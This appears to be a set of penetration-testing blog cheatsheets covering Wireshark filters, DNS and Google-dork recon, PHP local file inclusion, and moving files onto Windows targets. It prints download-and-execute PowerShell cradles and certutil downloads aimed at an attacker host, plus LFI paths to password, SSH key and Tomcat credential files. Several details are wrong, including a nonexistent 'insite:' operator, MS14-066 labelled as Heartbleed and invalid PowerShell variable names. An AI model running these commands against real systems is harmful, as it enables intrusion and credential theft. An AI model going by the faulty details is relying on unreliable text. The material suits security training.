Enumeration Cheatsheets

Wireshark Filters Cheatsheet

There are literally hundreds of these type of posts on the internet, with one of my favorites being https://wiki.wireshark.org/CaptureFilters. However, I wanted to create this ‘short’ list that contains my favorite go-to’s after performing Man in the Middle attacks.

This post will be updated as time goes on.

Understanding the Packet Capture

Before diving too deep, it’s always a good idea to get an idea of what type of traffic was captured so you know which filters to apply.

Viewing Protocol Statistics:
In the Menu, click on Statistics and select Protocol Hierarchy.


Filtering HTTP

If non-encrypted HTTP traffic was captured, we may be able to extract juicy details.

View all plaintext HTTP GET requests:
http.request.method == "GET"

View all plaintext HTTP POST requests:
http.request.method == "POST"

Filtering by specific redirect location:
http.location == login_success.php

To export HTTP objects (such as images or pages):
Select File. Click on Export Objects, and then HTTP.

Remember to always Right-Click a packet, and Follow the TCP Stream to get more details from the raw data.


Filtering FTP

FTP is pretty simple, since all traffic is sent in plaintext.

To view all FTP related traffic:
ftp

To export FTP objects (such as transferred files):
Select File. Click on Export Objects, and then TFTP.

Remember to always Right-Click a packet, and Follow the TCP Stream to get more details from the raw data.


Filtering SMB

SMB is a favorite to capture, as it is usually not encrypted and you may be able to exfiltrate files over the wire.

To view packets related to SMB files:
smb.file

To export SMB objects (such as transferred files):
Select File. Click on Export Objects, and then SMB.

Enumeration Cheatsheets

Active & Passive Recon Cheatsheet

This post contains various commands and methods for performing passive recon of a target. This article will be expanded upon as time goes on.


Performing Whois lookups

We can utilize public WHOIS databases to perform lookups on domains.
https://lookup.icann.org/

It may also be worthwhile utilizing other services, such as Namecheap. Once you know who the registrar is, it is typically best to perform a Whois lookup for your target using their domain registrar.
https://www.namecheap.com/domains/whois/

We can also utilize a Kali terminal for this:
whois <targetDomain>

You can use additional options to instruct the tool to use a different server.
whois -h whois.godaddy.com <targetDomain>


Performing DNS enumeration with Nslookup

To perform a lookup of the A records against a particular domain:
nslookup <targetDomain>

To look up the mail records:
nslookup -query=mx <targetDomain>

To look up Nameservers:
nslookup -query=ns <targetDomain>

To get all records that are available:
nslookup -query=any <targetDomain>

You can also drop into nslookup with no parameters interactively.
nslookup

While interactively working with nslookup, you can set your query:
set q=mx

You can also set your server if you wanted to query a different DNS server than your default one:
server 8.8.8.8


Performing DNS enumeration with Dig

To extract A records and Namerservers of a domain:
dig <targetDomain>

To query just A records:
dig <targetDomain> A

You can also limit the output to a specific record, and just return the answer section:
dig +nocmd <targetDomain> MX +noall +answer

Can attempt a DNS Zone transfer:
dig +nocmd <targetDomain> AXFR +noall +answer @<targetDNSServer>

To see more about a DNS Zone Transfer, see https://infinitelogins.com/2020/04/23/performing-dns-zone-transfer/


Automating DNS Enumeration

Fierce can be used to enumerate subdomains, IP ranges, and hostnames by using public DNS queries, zone transfer attempts, and brute forcing techniques.
fierce -dns <targetDomain>

You can also specify a specific DNS server for the tool to use.
fierce -dns <targetDomain> -dnsserver <targetNamserver>

We can also leverage a tool called DNSEnum to do something similar. It will look for the A records of the target domain, looks up the NS and MX records. Finally, it will attempt a zone transfer attack.
dnsenum <targetDomain>

You can also specify a specific DNS server for the tool to use. Sometimes the results will differ.
dnsenum <targetDomain> --dnsserver <targetNamserver>

You can use DNSEnum to brute force subdomains as well.
dnsenum <targetDomain> -f <dictionaryList>

DNSMap can also be used, but it doesn’t do much other than brute-force with a built-in wordlist.
dnsmap <targetDomain> -w wordlist.txt -r /tmp/results.txt

DNSMap to enumerate subdomains in bulk fashion:
dnsmap-bulk.sh domains.txt /tmp/results.txt

DNSRecon is an ‘all-in-one’ tool that can do most everything.
dnsrecon -d <targetDomain>


Google and Bing Dorking

Bing offers a query filter that returns websites hosted on a given IP address by entering the following Bing search:
ip:<targetIP>

Search Google for results within a particular website:
insite:<targetURL>

Search Google for specific filetypes:
insite:<targetURL> filetype:pdf

Search Google for particular text in title:
insite:<targetURL> intitle:admin
insite:<targetURL> intitle:index of

Search Google for particular text in body:
insite:<targetURL> intext:admin
insite:<targetURL> intext:index of

Additional payloads are found here. https://gist.github.com/clarketm/919457847cece7ce40323dc217623054


Various Tools:

Tips & Tricks

Exploiting PHP Based LFI


Different PHP Methods

There are two different methods that will create an LFI if not used correctly. Those two are:

file_get_contents() – This is going to just display the text within the file by reading the contents as a string, and will not interpret PHP code for execution. If the LFI is using this method, you can only enumerate files on the filesystem.

include() – This is going to execute everything within the PHP tag as actual PHP code. If the LFI is using this method, then we SHOULD be able to get command execution.

You can tell which method is being used by using the LFI to read the PHP file that causes the LFI.

  • If the source code IS displayed, then the PHP code was interpreted by the server and you have a file_get_content() LFI.
  • If the code is NOT displayed, then you have an include().

Example: Say your request looks like this:

GET /news.php?file=../news.php

Because the source code is visible in the response, we can assume we’re working with a file_get_content() LFI with no possibility of code execution.


Files to check while enumerating LFI:

../../../../../../../etc/passwd
../../../../../../../home/<users>/.ssh/authorized_keys
../../../../../../../home/<users>/.ssh/bash_history

To get the username of who we’re running as:
../../../../../../../proc/self/environ

To see what binary is running this service:
../../../../../../../proc/self/cmdline

If you have Tomcat running as well, you may want to enumerate these:

../../../../../../../usr/share/tomcat9/bin/catalina.sh
../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
../../../../../../../usr/share/tomcat9/conf/tomcat-users.xml

Note: Make sure to adjust the version number located in the path.

Tips & Tricks

Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.


Uploading and Hosting Files

Python Web Server

The following will start a webserver in the present working directory using Python2.
python -m SimpleHTTP Server 80

The following will start a webserver in the present working directory using Python3.
python3 -m http.server 80


Impacket SMB Server

You can download Impacket from Github.

We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory.
mkdir smb
impacket-smbserver <sharename> `<path>`

Then we can mount this file share in PowerShell from the other side.
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>

And change into the new drive.
cd <ShareName>:

Additional Method With Authentication:

On our Kali machine, we’ll start our Impacket server while in the directory we wish to host.
sudo impacket-smbserver <shareName> $(pwd) -smb2support -user <user> -p <password>

Then on the Windows machine, we’ll connect back to this SMB share, but we’ll need to specify the credentials mentioned in the above command. To do that, we’ll use the following commands:

$pass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<user>', $pass)
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName> -Credential $cred


Downloading Files

PowerShell

The following will download and store a remote file to disk.
Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"

The following will download and automatically execute the remote PowerShell script when ran from a command prompt.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')

An alternative to the above is to use Invoke-WebRequest in a different manner.
powershell.exe "IEX (IWR http://attackerIP/file.ps1 -UseBasicParsing)"


CertUtil

The following will download and store a remote file to disk.
certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe


Windows Defender

The following will download and store a remote file to disk.
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]


Transferring with SSH

To copy a file from B to A while logged into B:
scp /path/to/file username@a:/path/to/destination

To copy a file from B to A while logged into A:
scp username@b:/path/to/file /path/to/destination


Transferring via Base64 Encoding

From within a PowerShell session, you may want to encode the file into Base64 format so you can just copy it down to your destination machine and decode it on the other side. This is handy for transferring small files.

Within PowerShell, you can encode a file by running:

$file-contents = Get-Content "filename.txt"
$file-encode = [System.Text.Encoding]::UTF8.GetBytes($file-contents)
[System.Convert]::ToBase64String($file-encode)

Then, within Kali, you can decode it using the following:
echo -n <base64String> | base64 -d > filename.txt

This should create the file for you to interact with.


Pentesting, Tips & Tricks

Hacking Methodology Cheatsheet

This post is going to contain a list of common tools, vulnerabilities, & methodology tactics broken down by category and contains links to references that will showcase examples. This document will be updated often as I work through more and more resources.


Enumerating Common Services

Enumerating SMB 139,445

  • Using smbmap and smbclient to crawl and browse shares. Example of this in HTB FriendZone – Link to Ippsec video.

Enumerating LDAP 389


External Tools/Methodology

Using Hydra to Brute-Force Websites

Using ASP/ASPX Webshells

Enumerating Tomcat

Enumerating HTTP Proxies

Connecting to/Abusing IRC

Performing Zone Transfers


Local/Remote File Inclusion (LFI & RFI)

  • Using PHP Wrappers within LFI to Obtain PHP Script Source Code — My post
  • XML Entity Injection (XXE) Vuln for LFI. HackTheBox: DevOops. – Link to Ippsec Video

Privilege Escalation Techniques/Tools

Privilege Escalation: Using Sherlock

Privilege Escalation: Using Windows-Exploit-Suggester


Pivoting & Utilizing Proxies

Routing Tools Through Proxies


Common Vulnerabilities

Exploiting MS17-010 (EternalBlue)

  • HackTheBox: Blue

Exploiting MS14-066 (Heartbleed)

Exploiting CVE-2016-5195 (DirtyCow)


Common Active Directory Attacks

Abusing LLMNR/NBT-NS w/ Responder

Abusing IPv6

Utilizing CrackMapExec